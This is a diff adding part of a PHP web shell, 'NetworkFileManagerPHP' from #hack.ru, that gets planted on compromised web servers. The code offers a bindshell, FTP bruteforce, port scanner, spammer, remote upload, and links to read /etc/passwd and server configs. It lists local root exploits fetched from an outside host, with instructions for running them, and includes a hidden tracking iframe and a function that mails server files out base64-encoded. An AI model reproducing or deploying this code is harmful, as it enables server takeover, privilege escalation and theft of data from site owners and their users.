+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (� #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.3.2-4.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
